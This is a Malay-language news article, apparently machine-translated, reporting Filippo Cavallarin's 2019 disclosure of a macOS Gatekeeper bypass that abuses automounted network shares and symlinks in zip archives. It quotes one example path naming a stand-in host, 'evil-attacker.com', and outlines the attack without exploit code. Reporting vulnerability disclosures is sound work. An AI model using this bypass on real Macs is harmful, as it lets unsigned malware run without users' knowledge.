Mudah untuk memasang apl berniat jahat pada Mac. Apple tidak membetulkan ralat walaupun selepas tiga bulan

27. 5. 2019

Penyelidik keselamatan Filippo Cavallarin menyiarkan amaran tentang pepijat dalam macOS 10.14.5 pada blognya. Ini terdiri daripada kemungkinan memintas sepenuhnya langkah keselamatan Gatekeeper. Menurut Cavallarin, dia menunjukkan kesilapan itu kepada Apple pada Februari tahun ini, tetapi syarikat itu tidak membetulkannya dalam kemas kini terkini.

Gatekeeper telah dibangunkan oleh Apple dan dimasukkan ke dalam sistem pengendalian desktopnya buat kali pertama pada tahun 2012. Ia adalah mekanisme yang menghalang aplikasi daripada berjalan tanpa pengetahuan dan persetujuan pengguna. Selepas anda memuat turun aplikasi, Gatekeeper menyemak kodnya secara automatik untuk melihat sama ada perisian itu ditandatangani dengan betul oleh Apple.

Dalam catatan blognya, Cavallarin menyatakan bahawa Gatekeeper, secara lalai, menganggap kedua-dua storan luaran dan perkongsian rangkaian sebagai lokasi selamat. Sebarang aplikasi yang berada dalam sasaran ini oleh itu boleh dilancarkan secara automatik tanpa perlu melalui pemeriksaan Penjaga Pintu. Ciri inilah yang boleh dieksploitasi untuk melancarkan perisian hasad tanpa pengetahuan pengguna.

Satu aspek yang membenarkan akses tanpa kebenaran ialah ciri automount, yang membolehkan pengguna melekapkan perkongsian rangkaian secara automatik hanya dengan menentukan laluan bermula dengan "/net/". Sebagai contoh, Cavallarin memetik laluan "ls /net/evil-attacker.com/sharedfolder/" yang boleh menyebabkan sistem pengendalian memuatkan kandungan folder "sharefolder" di lokasi terpencil yang boleh berpotensi berniat jahat.

Anda boleh menonton cara ancaman itu berfungsi dalam video:

Faktor lain ialah hakikat bahawa jika arkib zip yang mengandungi pautan sym khusus yang membawa kepada fungsi automount dikongsi, ia tidak akan disemak oleh Gatekeeper. Dengan cara ini, mangsa boleh memuat turun arkib berniat jahat dengan mudah dan unzipnya, membenarkan penyerang menjalankan hampir sebarang perisian pada Mac tanpa pengetahuan pengguna. Finder, yang menyembunyikan sambungan tertentu secara lalai, juga mempunyai bahagian kelemahan ini.

Cavallarin menyatakan di blognya bahawa Apple menarik perhatian kepada kelemahan sistem pengendalian macOS pada 22 Februari tahun ini. Tetapi pada pertengahan Mei, Apple berhenti berkomunikasi dengan Cavallarin, jadi Cavallarin memutuskan untuk mendedahkan keseluruhan perkara itu kepada umum.

Sumber: FCVL

Topik: penyimpanan, secara automatik, MacOS, video, pelarasan, funkce, pengguna, Aplikasi, Apple

Perbincangan artikel

Nama awak

Komen anda

Dengan mengisi data di atas, saya mengakui bahawa syarikat TEXT FACTORY s.r.o., pejabat berdaftar di Brno, Durďákova 336/29, Černá Pole, Poskod: 613 00, nombor ID: 06157831, berdaftar di Mahkamah Wilayah di Brno, seksyen C , masukkan 100399, akan memproses data peribadi saya yang disediakan dalam borang pendaftaran yang diisi oleh saya atas dasar kepentingan sah TEXT FACTORY s.r.o mengikut Perkara 6 perenggan 1 surat f) GDPR dan untuk memenuhi kewajipan undang-undang (Perkara 6, perenggan 1, huruf c) GDPR), untuk tujuan berikut: keperluan untuk memastikan kebenaran pelawat ke tapak web yang dikendalikan oleh TEXT FACTORY s.r.o. untuk menyumbang secara aktif kepada artikel yang diterbitkan atau dalam perbincangan forum dan melaksanakan hak TEXT FACTORY s.r.o. sebagai pentadbir forum perbincangan ini. Maklumat lanjut tentang pemprosesan data peribadi dan hak boleh didapati dalam Pelajaran tentang perlindungan data peribadi. keseluruhan teks

boleh jadi menarik minat anda

Berkaitan